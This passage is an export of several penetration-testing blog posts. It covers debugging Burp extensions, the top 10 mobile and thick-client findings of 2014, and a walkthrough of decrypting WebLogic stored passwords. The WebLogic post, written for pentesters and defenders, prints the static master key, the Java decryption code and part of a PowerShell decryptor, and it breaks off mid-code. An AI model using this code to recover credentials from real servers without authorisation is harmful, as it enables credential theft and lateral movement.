Next, we'll open this up in our IDE. I'm using IntelliJ, but this can be accomplished using any Java IDE (I think). Select File > Open and navigate to the directory and press OK. IntelliJ should open the directory as a project in its workspace.

Img Fb Cd

Attaching the Debugger

Now that we have our Burp extension in IntelliJ, let's configure our debugger. Unfortunately, we can't just hit Run > Debug to start debugging.

Img Fc C E

Burp extensions are executed inside Burp. They are generally not standalone jar files with a main class. We can still debug them however with the Java's remote debugging capability. This allows the debugger to attach to a Java process and send and receive debug information. To do this, select Edit Configurations from Run.

Img Fcd Ad

A Run/Debug Configurations window should appear.

Img Fcfd

Press the green plus sign and select Remote. You should see a window that looks like this:

Img Fd E F

This allows us to setup remote debugging against running processes. Name the configuration whatever you like, I use Burp. Leave all the configuration options set to the defaults unless you know what you're doing. Next, copy the first command line string. The one that starts -agentlib. You need to add this as an argument to your Java process for the debugger to attach to it. When executed, Java will open up the port 5005 for remote debugging. This allows the debugger to send commands through that port to the JVM process. Press OK at the bottom of the window. You should now see your debug configuration under Run.

Img Fe C B

Now we need to start Burp with the command line argument from our debug configuration. Open up a command prompt and start Burp with the argument.
C:>java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005 -jar burpsuite_pro_v1.6.18.jar Listening for transport dt_socket at address: 5005
The JVM should now be listening on port 5005, the port we specified in our configuration. Next, we'll go back to our IDE and select Run > Debug Burp. The console window should pop up saying it is connected to the target VM.

Img Ffaa F B

Setting Breakpoints

Now that we have our debugger attached to Burp we can start setting breakpoints in our extension code. First, make sure your extension is actually loaded in Burp's extender! When setting breakpoints, try not to set them on method names themselves. This can slow down Burp considerably. Instead, set breakpoints on lines of code within the methods you want to debug. The first breakpoint I'm going to set is within the WSDL parsing method in my extension. We will pause execution at the point the response byte array is set.

Img Caf A

If everything is setup, go back to Burp and execute whatever is needed for you extension to be used. In this example, I will right click on the request I want to parse the WSDL from and select Parse WSDL.

Img A C E

Our debugger should pause on the breakpoint immediately and display the current frames and variables.

Img F F D

We can walk through the code by selecting the step buttons on the top of the debugging menu.

Img Df

Stepping over the response assignment should reveal the response variable in the variables section of the debug console. The debugger should also be on the next line of code.

Img Dceda E

We can go further and step inside functions, but I'll leave that out for now.

Conclusion

Hopefully this little tutorial is somewhat helpful when trying to fix your Burp extensions through debugging. I know I have spent hours debugging my own extensions and the Java debugger is immensely more helpful than having System.out.println() statements everywhere. [post_title] => Debugging Burp Extensions [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => debugging-burp-extensions [to_ping] => [pinged] => [post_modified] => 2021-06-08 21:46:23 [post_modified_gmt] => 2021-06-08 21:46:23 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=4131 [menu_order] => 676 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [5] => WP_Post Object ( [ID] => 3445 [post_author] => 7 [post_date] => 2015-05-11 07:00:33 [post_date_gmt] => 2015-05-11 07:00:33 [post_content] => We saw a very large increase in the number of mobile applications we tested in 2014. Among them, there were slightly more iOS applications than Android ones. In this blog post I will cover high level trends and the top 10 critical vulnerabilities we saw in 2014 during mobile applications penetration tests.

High Level Trends

There were a lot of new trends in 2014 compared to previous years. I've listed some of the more interesting ones below.
  • An increase in the use of cross-platform development frameworks such as PhoneGap, Appcelerator, and Xamarin to write applications that can be deployed to both iOS and Android
  • A decrease in wrapped browser (webview) applications
  • An increase in the use of MDM solutions to push out applications to enterprise devices
  • An increase in the use of MDM solutions to encrypt application traffic
  • A decrease in applications using the local SQLite database to store anything but configuration information
  • An increase in applications using root/jailbreak detection to prevent installation
  • An increase in certificate pinning to help prevent encrypted traffic interception
In my previous Top 10 blog post on Thick Applications, I pointed out that we spend most of our time testing web services. This is also true with mobile applications. You may also notice that many of the findings listed here are also found in the thick application post. It just goes to show that new hot-off-the-press mobile applications suffer from the same problems that plague thick applications created fifteen years ago. So without further ado, here are the top 10 critical mobile applications findings for 2014 list in order from most to least common.

SQL Injection

SQL injection is still very prevalent via the web services of a mobile application. Rarely if ever do we see it against an application's local SQLite database however.  We often see that application developers take the mobile aspect for granted and don’t properly protect their web services on the backend. However, it is very easy to proxy a connection between a device and a server on iOS and Android. Don't rely on protective measures such as certificate pinning to prevent traffic tampering, it's not effective. Fix the issue at it's heart.

Cleartext Credential Storage

We often see that mobile applications store unencrypted credentials within configuration files and local SQLite databases on a device. Usually they can be used to access potential sensitive data and external services. This is bad. Never store credentials anywhere on a device. If your application stores credentials to re-authenticate to a backend service without the user having to provide them again, consider using a time-limited session key that can be destroyed.

Hardcoded Credentials in Source Code

This is pretty common for us to find and primarily affects Android applications because they can be decompiled back to nearly complete Java code if they're not obfuscated. It is possible to disassemble iOS binaries and search for credentials in them too. Never hardcode credentials in the code of an application. If a user can access your application, they can undoubtably access anything within the source code as well. Never assume people aren't looking.

Hardcoded Encryption Keys

We see encryption keys hardcoded in source code all the time. Again, this primarily affects Android applications because of the relatively ease of decompiling APK files. As I said in my thick application post, encryption is only as strong as where the key is held. The recommendation is also the same. If data requires encryption with a key, move it from the client to the server to prevent access to keys.

Hardcoded or Nonexistent Salts

I'll take the exact blurb that I used in my thick application post. When using encryption, it is always a good idea to use a salt. However, if that salt is hardcoded in an application with an encryption key, it becomes pretty much useless. When it comes to encryption being a salty S.O.B. is a good thing. Randomize! Randomize! Randomize!

XML External Entity Injection

This has become more prevalent in the past year with many mobile web services communicating with XML. XXE often results in read access to files on the server and UNC path injection that can be used to capture and crack credentials used to on associate web server if it is running Windows. Most XML parsing libraries support disallowing declared DTDs and entities. This should be set as the default when reading XML to help prevent injection. Another possible fix is to scrap XML all together and instead use JSON where this isn't an issue.

Logging of Sensitive Information

Logging of data is fairly common in applications that we test both in production and QA environments. Often times it comes from having some type of debugging option enabled. This isn't necessarily a bad thing until there’s data that you don’t want anyone to see. The most common sensitive data we see are credentials. Make sure that debugging is disabled for productions applications and check application and system logs during testing to ensure unintended data is not there.

Unencrypted Transmission of Data

This is still common to see in mobile applications. Every application we test uses web services, but not all use encryption. Utilizing TLS should be the default on all traffic coming to and from the application. Often times we see this in mobile applications developed for use in internal environments where security requirements are unfortunately more relaxed. Throw that notion out the window and encrypted everything.

Authorization Bypass

As with thick applications, we see a lot of mobile applications use the GUI to enforce security controls without checking authorization on the backend. A user could access what they need by bypassing the GUI entirely and sending the requests they want directly through a proxy such as Burp. We have also seen applications pulling user permissions from the server and storing them on the client. A user could modify the permissions from the HTTP response before it reaches the client. Usually these permissions are worded in such a way that there meaning is obvious such as has_access_to_secret_information=false. Replacing everything with true is an easy way to bump up your privileges and bypass intended application authorization. The solution is to never rely on the client for authorization checks.

Sensitive Data Displayed in the GUI

This finding is pretty self explanatory. An application displays cleartext passwords, social security numbers, credit card numbers, etc... unmasked within the GUI. This is bad not only because that information should generally not be displayed to the user, but also because it has to be stored either on the device or within a backend database somewhere. This is also bad if coupled with mobile applications not requiring users to re-authenticate if the application has been put into the background on the device. For example, it you have an application open and you hit the home button on an iOS device, the application is paused in the background. Selecting the application again will generally reopen it where you left off. So if you give someone your iPad after you looked at an application that doesn't mask sensitive information about you, that someone could just open it up again and see everything. This can be especially bad if you don't have a password set on your lockscreen.

Conclusion

Everything is going mobile, and the security of the information that can be accessed and stored should be priority number one. Take the above information in consideration when developing your mobile applications and always remember to test. If you're not testing your apps, someone else will, and they probably won't be so candid about what they find. [post_title] => Top 10 Critical Findings of 2014 - Mobile Applications [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => top-10-critical-findings-of-2014-mobile-applications [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:32:06 [post_modified_gmt] => 2023-03-16 14:32:06 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=3445 [menu_order] => 678 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [6] => WP_Post Object ( [ID] => 3419 [post_author] => 7 [post_date] => 2015-04-13 07:00:41 [post_date_gmt] => 2015-04-13 07:00:41 [post_content] => 2014 has come and gone, so we thought we'd put out a list of some of the most common critical findings that we saw during thick application penetration tests over the past year. We keep a massive amount of statistics for every assessment we do and in this blog I’ll cover high level trends and the top 10 vulnerabilities we found.  This should be interesting to application penetration testers and large companies that develop and manage their own code in house.

High Level Trends

Most of the thick applications we looked at were older and primarily written in Java, C#, and C/C++.  It’s still pretty common to see companies making them available over the internet via Citrix and Terminal service web interfaces. I also want to point out that when assessing newer thick applications we spend almost 90% of our time reviewing web service methods and configurations, because thick clients are basically just a wrapper for backend web service methods. Below are the top 10 critical thick application findings for 2014 list in order from most to least common.

Cleartext Credential Storage

This is by far the most common thing we see across all of the thick applications we test. From our testing, credentials are usually stored in configuration files within the installation directory of an application, a local user preferences directory, or within the registry.  If you’re doing this, consider using integrated authentication and moving away from the two-tier architecture model.

Hardcoded Credentials in Source Code

Along with storing credentials on the operating system itself, we see applications with hardcoded credentials within their source code almost 100% of the time. This is mostly a problem in applications that use managed code: Java and C#/VBscript with .NET, for example. The most prevalent credentials? Database usernames and passwords. It's very easy for a developer to hardcode them into source code and leave them there in production.  More times than not this results in the full compromise of the database and the backend database server.  Once again, if you’re doing something like this, consider using integrated authentication and moving away from the two-tier architecture model.

Hardcoded Encryption Keys

If an application uses encryption to protect sensitive information such as credentials, it is at least one step ahead of the curve. However, encryption is only as strong as where the key is held. Often times an encryption key is stored in an encryption function within the source code of an application. Again, hardcoded keys affect the majority of managed code applications that we see. If a static key is used on installation of an application, a user could use that key do decrypt data that someone else may have.  If this sounds like something you’ve done, consider moving the encryption of data to the server side were evil users can’t get their hands on your encryption keys.

Hardcoded or Nonexistent Salts

When using encryption, it is always a good idea to use a salt. However, if that salt is hardcoded in an application with an encryption key, it becomes pretty much useless. When it comes to encryption being a salty S.O.B. is a good thing.  Randomize! Randomize! Randomize!

Unencrypted Transmission of Data

We see a lot of applications that do not use encryption when transmitting data. Keep in mind that most of the applications that we test are used by the healthcare and financial industries, where sensitive information needs to be protected. While it is most common to find this over HTTP (web services), we see a fair amount of unencrypted TDS traffic for SQL data. If you don’t have encryption at the transport layer make sure to SSL (TLS) all the things!

SQL Injection

SQL Injection has been around for a long time and still affects many applications and services. Most of the applications we test access SQL databases on the backend, usually MSSQL and Oracle.  A lot of the backend processing for thick applications just don’t implement proper sanitation and parameterization of queries. As a result, it isn't hard for a malicious user to attach a proxy to intercept HTTP and TDS requests.  Tools like Burp Suite and Echo Mirage make it pretty easy. Often times just inserting a single tick in an input field can cause a SQL error to pop up to the user. Make sure to enforce the principal of least privilege and sanitize your input everywhere!

Authorization Bypass

A lot of thick application employ security through GUI controls but leave web services completely wide open. A user that may not be able to access a piece of functionality through the GUI of a thick application, but can usually request what they need through a web service without any authorization checks.

XML External Entity Injection

Many thick applications employ XML for configuration files, HTTP requests and responses, and exporting and importing data. A lot of applications were simply created before the influx of entity injections attacks and thus were never properly protected against them on the client side or server side.  XXE often results in read access to files on the server, and UNC path injection that can be used to capture and crack credentials used to on associate web server. Most XML parsing libraries support disallowing declared DTDs and entities. This should be set as the default when reading XML to help prevent injection.

SQL Query Manipulation

It is not uncommon to see the use of direct SQL queries within an application that a user can freely edit for their use. We see this most often in custom search windows where a user is given the ability to search tables as they please. Executing SQL queries almost always leads to a complete takeover of the backend database server and, from there, movement within the environment.  The general recommendation is don’t do that unless your required use case is “allow users to take over the network”.

Custom Encryption

This has come up a couple of times within the past year where an application rolls its own encryption algorithms. More often than not this ends up being some type of substitution cipher where every character is replaced with another one. Simply reversing the algorithm gives you back the cleartext format of whatever was encrypted. NEVER ROLL YOUR OWN CRYPTO! [post_title] => Top 10 Critical Findings of 2014 - Thick Applications [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => top-10-critical-findings-of-2014-thick-applications [to_ping] => [pinged] => [post_modified] => 2023-03-16 09:32:44 [post_modified_gmt] => 2023-03-16 14:32:44 [post_content_filtered] => [post_parent] => 0 [guid] => https://netspiblogdev.wpengine.com/?p=3419 [menu_order] => 683 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [7] => WP_Post Object ( [ID] => 3125 [post_author] => 7 [post_date] => 2015-04-06 07:00:48 [post_date_gmt] => 2015-04-06 07:00:48 [post_content] =>

The following blog walks through part of a recent penetration test and the the decryption process for WebLogic passwords that came out of it. Using these passwords I was able to escalate onto other systems and Oracle databases. If you just want code and examples to perform this yourself, head here: https://github.com/NetSPI/WebLogicPasswordDecryptor.

Introduction

Recently on an internal penetration test I came across a couple of Linux servers with publicly accessible Samba shares. Often times, open shares contain something interesting. Whether it be user credentials or sensitive information, and depending on the client, open shares will contain something useful. In this instance, one of the shares contained a directory named “wls1035”. Going through the various acronyms in my head for software, this could either be Windows Live Spaces or WebLogic Server. Luckily it was the later and not Microsoft’s failed blogging platform.

WebLogic is an application server from Oracle for serving up enterprise Java applications. I was somewhat familiar with it, as I do see it time to time in enterprise environments, but I've never actually installed it or taken a look at its file structure. At this point I started to poke around the files to see if I could find anything useful, such as credentials. Doing a simple grep search for “password” revealed a whole lot of information. (This is not actual client data)

user@box:~/wls1035# grep -R "password" *
Binary file oracle_common/modules/oracle.jdbc_12.1.0/aqapi.jar matches
oracle_common/plugins/maven/com/oracle/maven/oracle-common/12.1.3/oracle-common-12.1.3.pom:    &lt;!-- and password for your server here. --&gt;
user_projects/domains/mydomain/bin/startManagedWebLogic.sh:#  to your system password for no username and password prompt 
user_projects/domains/mydomain/bin/stopManagedWebLogic.sh:# WLS_PW         - cleartext password for server shutdown
user_projects/domains/mydomain/bin/stopWebLogic.sh:	if [ "${password}" != "" ] ; then
user_projects/domains/mydomain/bin/stopWebLogic.sh:		wlsPassword="${password}"
user_projects/domains/mydomain/bin/stopWebLogic.sh:echo "connect(${userID} ${password} url='${ADMIN_URL}', adminServerName='${SERVER_NAME}')" &gt;&gt;"shutdown-${SERVER_NAME}.py" 
user_projects/domains/mydomain/bin/startWebLogic.sh:	JAVA_OPTIONS="${JAVA_OPTIONS} -Dweblogic.management.password=${WLS_PW}"
user_projects/domains/mydomain/bin/startWebLogic.sh:echo "*  password assigned to an admin-level user.  For *"
user_projects/domains/mydomain/bin/nodemanager/wlscontrol.sh:    if [ -n "$username" -a -n "$password" ]; then
user_projects/domains/mydomain/bin/nodemanager/wlscontrol.sh:       print_info "Investigating username: '$username' and password: '$password'"
user_projects/domains/mydomain/bin/nodemanager/wlscontrol.sh:       echo "password=$password" &gt;&gt;"$NMBootFile.tmp"
user_projects/domains/mydomain/bin/nodemanager/wlscontrol.sh:       unset username password
user_projects/domains/mydomain/bin/nodemanager/wlscontrol.sh:       echo "password=$Password" &gt;&gt;"$NMBootFile.tmp"
user_projects/domains/mydomain/init-info/config-nodemanager.xml:  &lt;nod:password&gt;{AES}WhtOtsAZ222p0IumkMzKwuhRYDP117Oc55xdMp332+I=&lt;/nod:password&gt;
user_projects/domains/mydomain/init-info/security.xml:  &lt;user name="OracleSystemUser" password="{AES}8/rTjIuC4mwlrlZgJK++LKmAThcoJMHyigbcJGIztug=" description="Oracle application software system user."&gt;

There weren't any cleartext passwords, but there were encrypted ones in the same style as this: {AES}WhtOtsAZ222p0IumkMzKwuhRYDP117Oc55xdMp332+I=
I then narrowed down my search to see if I could find more of these passwords. This was the result:

user@box:~/wls1035# grep -R "{AES}" *
user_projects/domains/mydomain/init-info/config-nodemanager.xml:  &lt;nod:password&gt;{AES}WhtOtsAZ222p0IumkMzKwuhRYDP117Oc55xdMp332+I=&lt;/nod:password&gt;
user_projects/domains/mydomain/init-info/security.xml:  &lt;user name="OracleSystemUser" password="{AES}8/rTjIuC4mwlrlZgJK++LKmAThcoJMHyigbcJGIztug=" description="Oracle application software system user."&gt;
user_projects/domains/mydomain/init-info/security.xml:  &lt;user name="supersecretuser" password="{AES}BQp5xBlvsy6889edpwXUZxCbx7crRc5+TNuZHSBl50A="&gt;
user_projects/domains/mydomain/servers/myserver/security/boot.properties:username={AES}/DG7VFmJODIZJoQGmqxU8OQfkZxiKLuHQ69vqYPgxyY=
user_projects/domains/mydomain/servers/myserver/security/boot.properties:password={AES}Bqy44qL0EM4ZqIqxgIRQxXv1lg7PxZ7lI1DLlx7njts=
user_projects/domains/mydomain/config/config.xml:    &lt;credential-encrypted&gt;{AES}Yl6eIijqn+zdATECxKfhW/42wuXD5Y+j8TOwbibnXkz/p4oLA0GiI8hSCRvBW7IRt/kNFhdkW+v908ceU75vvBMB4jZ7S/Vdj+p+DcgE/33j82ZMJbrqZiQ8CVOEatOL&lt;/credential-encrypted&gt;
user_projects/domains/mydomain/config/config.xml:    &lt;node-manager-password-encrypted&gt;{AES}+sSbNNWb5K1feAUgG5Ah4Xy2VdVnBkSUXV8Rxt5nxbU=&lt;/node-manager-password-encrypted&gt;
user_projects/domains/mydomain/config/config.xml:    &lt;credential-encrypted&gt;{AES}nS7QvZhdYFLlPamcgwGoPP7eBuS1i2KeFNhF1qmVDjf6Jg6ekiVZOYl+PsqoSf3C&lt;/credential-encrypted&gt;

There were a lot of encrypted passwords and that fueled my need to know what they contain. Doing a simple base64 decode didn't reveal anything, but I didn't expect it to, based on each string being prepended with {AES}. In older versions of WebLogic the encryption algorithm is 3DES (Triple DES) which has a format similar to this: {3DES}JMRazF/vClP1WAgy1czd2Q== . This must mean there was a key that was used for encrypting, which means the same key is used for decrypting. To properly test all of this, I needed to install my own WebLogic server.

WebLogic is free from Oracle and is located here. For this blog I am using version 12.1.3. Installing WebLogic can be a chore in and of itself and I won't be covering it. One take away from the installation is configuring a new domain. This shouldn't be confused with Windows domain. Quoting the WebLogic documentation, "A domain is the basic administration unit for WebLogic Server instances." Every domain contains security information. This can be seen in the grep command from above. All the file paths that contain encrypted passwords are within the mydomain directory.

Now that I had my own local WebLogic server installed, it was time to find out how to decrypt the passwords. Some quick googling resulted in a few Python scripts that could do the job. Interestingly enough, WebLogic comes with a scripting tool called WLST (WebLogic Scripting Tool) that allows Python to run WebLogic methods. This includes encryption and decryption methods. We can also run it standalone to just encrypt:

root@kali:~/wls12130/user_projects/domains/mydomain# java weblogic.WLST

Initializing WebLogic Scripting Tool (WLST) ...

Welcome to WebLogic Server Administration Scripting Shell

Type help() for help on available commands

wls:/offline&gt; pw = encrypt('password')
wls:/offline&gt; print pw
{AES}ZVmyuf5tlbDLR3t8cNIzyMeftK2/7LWElJfiunFl1Jk=

To decrypt, I used the following python script from Oracle.

import os
import weblogic.security.internal.SerializedSystemIni
import weblogic.security.internal.encryption.ClearOrEncryptedService

def decrypt(agileDomain, encryptedPassword):
    agileDomainPath = os.path.abspath(agileDomain)
    encryptSrv = weblogic.security.internal.SerializedSystemIni.getEncryptionService(agileDomainPath)
    ces = weblogic.security.internal.encryption.ClearOrEncryptedService(encryptSrv)
    password = ces.decrypt(encryptedPassword)
	
    print "Plaintext password is:" + password

try:
    if len(sys.argv) == 3:
        decrypt(sys.argv[1], sys.argv[2])
    else:
		print "Please input arguments as below"
		print "		Usage 1: java weblogic.WLST decryptWLSPwd.py  "
		print "		Usage 2: decryptWLSPwd.cmd "
		print "Example:"
		print "		java weblogic.WLST decryptWLSPwd.py C:AgileAgile933agileDomain {AES}JhaKwt4vUoZ0Pz2gWTvMBx1laJXcYfFlMtlBIiOVmAs="
		print "		decryptWLSPwd.cmd {AES}JhaKwt4vUoZ0Pz2gWTvMBx1laJXcYfFlMtlBIiOVmAs="
except:
    print "Exception: ", sys.exc_info()[0]
    dumpStack()
    raise

To test this script I needed to use an encrypted password from my newly installed WebLogic server. Using the same grep command from above returns the same number of results:

root@kali:~/wls12130# grep -R "{AES}" *
user_projects/domains/mydomain/init-info/config-nodemanager.xml: &lt;nod:password&gt;{AES}OjkNNBWD9XEG6YM36TpP+R/Q1f9mPwKIEmHxwqO3YNQ=&lt;/nod:password&gt;
user_projects/domains/mydomain/init-info/security.xml: &lt;user name="OracleSystemUser" password="{AES}gTRFf+pONckQsJ55zXOw5JPfcsdNTC0lAURre/3zK0Q=" description="Oracle application software system user."&gt;
user_projects/domains/mydomain/init-info/security.xml: &lt;user name="netspi" password="{AES}Dm/Kp/TkdGwaikv3QD40UBhFQQAVtfbEXEwRjR0RpHc="&gt;
user_projects/domains/mydomain/servers/myserver/security/boot.properties:username={AES}0WDnHP4OC5iVBze+EQ2JKGgtUb8K1mMK8QbtSTgKq+Y=
user_projects/domains/mydomain/servers/myserver/security/boot.properties:password={AES}OGs2ujN70+atq9F70xqXxFQ11CD5mGuxuekNJbRGJqM=
user_projects/domains/mydomain/config/config.xml: &lt;credential-encrypted&gt;{AES}KKGUxV84asQMrbq74ap373LNnzsXbchoJKu8IxecSlZmXCrnBrb+6hr8Z8bOCIHTSKXSl9myvwYQ2cXQ7klCF7wxqlkf0oOHw2VaFdFtlNAY1TuFGmkByRW4xaV2ITSo&lt;/credential-encrypted&gt;
user_projects/domains/mydomain/config/config.xml: &lt;node-manager-password-encrypted&gt;{AES}mY78lCyPd5GmgEf7v5qYTQvowjxAo4m8SwRI7rJJktw=&lt;/node-manager-password-encrypted&gt;
user_projects/domains/mydomain/config/config.xml: &lt;credential-encrypted&gt;{AES}/0yRcu56nfpxO+aTceqBLf3jyYdYR/j1+t4Dz8ITAcoAfsKQmYgJv1orfpNHugPM&lt;/credential-encrypted&gt;

Taking the first encrypted password and throwing it into the Python script did indeed return the cleartext password for my newly created domain:

root@kali:~/wls12130/user_projects/domains/mydomain# java weblogic.WLST decrypt.py . "{AES}OjkNNBWD9XEG6YM36TpP+R/Q1f9mPwKIEmHxwqO3YNQ="

Initializing WebLogic Scripting Tool (WLST) ...

Welcome to WebLogic Server Administration Scripting Shell

Type help() for help on available commands

Plaintext password is:Password1

The only problem is, we had to be attached to WebLogic to get it. I want to be able to decrypt passwords without having to run scripts through WebLogic.

Down the Rabbit Hole

My first steps in figuring out how passwords are both encrypted and decrypted was to look at the Python script we obtained and see what libraries the script is calling. The first thing it does import the following:

import weblogic.security.internal.SerializedSystemIni
import weblogic.security.internal.encryption.ClearOrEncryptedService

It then makes the following method calls within the decrypt function:

encryptSrv = weblogic.security.internal.SerializedSystemIni.getEncryptionService(agileDomainPath)
ces = weblogic.security.internal.encryption.ClearOrEncryptedService(encryptSrv)
password = ces.decrypt(encryptedPassword)

The first line takes the path of the domain as a parameter. In our case, the domain path is /root/wls12130/user_projects/domains/mydomain . What the weblogic.security.internal.SerializedSystemIni.getEncryptionService  call does next is look for the SerializedSystemIni.dat file within the security directory. The SerializedSystemIni.dat file contains the salt and encryption keys for encrypting and decrypting passwords. It's read byte-by-byte in a specific order. Here’s a pseudocode version of what’s going on along with an explanation for each line.

file = “SerializedSystemIni.dat”
numberofbytes = file.ReadByte()
salt = file.ReadBytes(byte)
encryptiontype = file.ReadByte()
numberofbytes = file.ReadByte()
encryptionkey = file.ReadBytes(numberofbytes)
if encryptiontype == AES then
	numberofbytes = file.ReadByte()
	encryptionkey = file.ReadBytes(numberofbytes)
  1. The first thing that happens is the first byte of the file is read. That byte is an integer for the number of bytes in the salt.
  2. The salt portion is then read up to the amount of bytes that were specified in the byte variable.
  3. The next byte is then read, which is assigned to the encryptiontype variable.
  4. Then the next byte is read, which is another integer for how many bytes should be read for the encryptionkey.
  5. The bytes for the encryptionkey are read.
  6. Now, if the encryptiontype is equal to AES, we go into the if statement block.
  7. The next byte is read, which is the number of bytes in the encryptionkey.
  8. The bytes for the encryptionkey are read.

As I noted before, WebLogic uses two encryption algorithms depending on the release. These are 3DES and AES. This is where the two encryption keys come into play from above. If 3DES is in use, the first encryption key is used. If AES is used, the second encryption key is used.

After doing a little bit of searching, I figured out that BouncyCastle is the library that is performing all the crypto behind the scenes. The next step is to start implementing the decryption ourselves. We have at least some idea of what is going on under the hood. For now, we will just focus on the AES decryption portion instead of 3DES. I'm not terribly familiar with BouncyCastle or Java crypto implementation, so I did some googling on how to implement AES decryption with it. The result is the following snippet of code:

IvParameterSpec ivParameterSpec = new IvParameterSpec(iv);
Cipher outCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
outCipher.init(Cipher.DECRYPT_MODE, secretKeySpec,ivParameterSpec);

byte[] cleartext = outCipher.doFinal(encryptedPassword);

This code is promising, but unfortunately doesn’t work. We don’t know what the IV is and using the encryption key as the SecretKeySpec won’t work because it’s not the correct type. Plus we have this salt that is probably used somewhere. After many hours of digging I figured out that the IV happens to be the first 16 bytes of the base64 decoded ciphertext and the encrypted password is the last 16 bytes. I made an educated guess that the salt is probably part of the PBEParameterSpec, because the first parameter in the documentation for it is a byte array named salt. The encryption key that we have also happens to be encrypted itself. So now we have to decrypt the encryption key and then use that to decrypt the password. I found very few examples of this type of encryption process, but after more time I was finally able to put the following code together:

PBEParameterSpec pbeParameterSpec = new PBEParameterSpec(salt, 0);

Cipher cipher = Cipher.getInstance(algorithm);
cipher.init(Cipher.DECRYPT_MODE, secretKey, pbeParameterSpec);
SecretKeySpec secretKeySpec = new SecretKeySpec(cipher.doFinal(encryptionkey), "AES");

byte[] iv = new byte[16];
System.arraycopy(encryptedPassword1, 0, iv, 0, 16);
byte[] encryptedPassword2 = new byte[16];
System.arraycopy(encryptedPassword1, 16, encryptedPassword2, 0, 16);
IvParameterSpec ivParameterSpec = new IvParameterSpec(iv);
Cipher outCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
outCipher.init(Cipher.DECRYPT_MODE, secretKeySpec,ivParameterSpec);

byte[] cleartext = outCipher.doFinal(encryptedPassword2);

So now we have a decryption process for the encryption key, but we don’t know the key that decrypts it that or the algorithm that is being used.

I found that WebLogic uses this algorithm PBEWITHSHAAND128BITRC2-CBC  and the key that is being used happens to be static across every installation of WebLogic, which is the following:

0xccb97558940b82637c8bec3c770f86fa3a391a56

Now we can fix our code up a bit. Looking through examples of password based encryption in BouncyCastle, this seemed to maybe be right.

SecretKeyFactory keyFact = SecretKeyFactory.getInstance("PBEWITHSHAAND128BITRC2-CBC");

PBEKeySpec pbeKeySpec = new PBEKeySpec(password,salt,iterations);

SecretKey secretKey = keyFact.generateSecret(pbeKeySpec);

The PBEKeySpec takes a password, salt, and iteration count.  The password will be our static key string, but we have to convert it to a char array first. The second is our salt, which we already know. The third is an iteration count, which we do not know. The iteration count happens to be five. I actually just wrote a wrapper around the method and incremented values until I got a successful result.
Here is our final code:

public static String decryptAES(String SerializedSystemIni, String ciphertext) throws NoSuchAlgorithmException, InvalidKeySpecException, NoSuchPaddingException, InvalidAlgorithmParameterException, InvalidKeyException, BadPaddingException, IllegalBlockSizeException, IOException {

    byte[] encryptedPassword1 = new BASE64Decoder().decodeBuffer(ciphertext);
    byte[] salt = null;
    byte[] encryptionKey = null;

    String key = "0xccb97558940b82637c8bec3c770f86fa3a391a56";

    char password[] = new char[key.length()];

    key.getChars(0, password.length, password, 0);

    FileInputStream is = new FileInputStream(SerializedSystemIni);
    try {
        salt = readBytes(is);

        int version = is.read();
        if (version != -1) {
            encryptionKey = readBytes(is);
            if (version &gt;= 2) {
                encryptionKey = readBytes(is);
            }
        }
    } catch (IOException e) {

    }

    SecretKeyFactory keyFactory = SecretKeyFactory.getInstance("PBEWITHSHAAND128BITRC2-CBC");

    PBEKeySpec pbeKeySpec = new PBEKeySpec(password, salt, 5);

    SecretKey secretKey = keyFactory.generateSecret(pbeKeySpec);

    PBEParameterSpec pbeParameterSpec = new PBEParameterSpec(salt, 0);

    Cipher cipher = Cipher.getInstance("PBEWITHSHAAND128BITRC2-CBC");
    cipher.init(Cipher.DECRYPT_MODE, secretKey, pbeParameterSpec);
    SecretKeySpec secretKeySpec = new SecretKeySpec(cipher.doFinal(encryptionKey), "AES");

    byte[] iv = new byte[16];
    System.arraycopy(encryptedPassword1, 0, iv, 0, 16);
    byte[] encryptedPassword2 = new byte[16];
    System.arraycopy(encryptedPassword1, 16, encryptedPassword2, 0, 16);

    IvParameterSpec ivParameterSpec = new IvParameterSpec(iv);
    Cipher outCipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
    outCipher.init(Cipher.DECRYPT_MODE, secretKeySpec, ivParameterSpec);

    byte[] cleartext = outCipher.doFinal(encryptedPassword2);

    return new String(cleartext, "UTF-8");

}

We run this with our SerializedSystemIni.dat file as the first argument and the encrypted password as the second without the prepended {AES}. The result returns our password!

Img D Abf

As an exercise, I wanted to do this without having to touch Java ever again. So I decided to try it in PowerShell, everyone’s favorite pentest scripting. BouncyCastle provides a DLL that we can use to perform the decryption. We just have to use reflection within the PowerShell code to call the methods. The result is the following PowerShell code:

&lt;#
    Author: Eric Gruber 2015, NetSPI
    .Synopsis
    PowerShell script to decrypt WebLogic passwords
    .EXAMPLE
    Invoke-WebLogicPasswordDecryptor -SerializedSystemIni C:SerializedSystemIni.dat -CipherText "{3DES}JMRazF/vClP1WAgy1czd2Q=="
    .EXAMPLE
    Invoke-WebLogicPasswordDecryptor -SerializedSystemIni C:SerializedSystemIni.dat -CipherText "{AES}8/rTjIuC4mwlrlZgJK++LKmAThcoJMHyigbcJGIztug="
#&gt;
function Invoke-WebLogicPasswordDecryptor
{
    [CmdletBinding()]
    Param
    (
        [Parameter(Mandatory = $true,
        Position = 0)]
        [String]
        $SerializedSystemIni,

        [Parameter(Mandatory = $true,
        Position = 0)]
        [String]
        $CipherText,

        [Parameter(Mandatory = $false,
        Position = 0)]
        [String]
        $BouncyCastle
    )

    if (!$BouncyCastle)
    {
        $BouncyCastle = '.BouncyCastle.Crypto.dll'
    }

    Add-Type -Path $BouncyCastle

    $Pass = '0xccb97558940b82637c8bec3c770f86fa3a391a56'
    $Pass = $Pass.ToCharArray()

    if ($CipherText.StartsWith('{AES}'))
    {
        $CipherText = $CipherText.TrimStart('{AES}')
    }
    elseif ($CipherText.StartsWith('{3DES}'))
    {
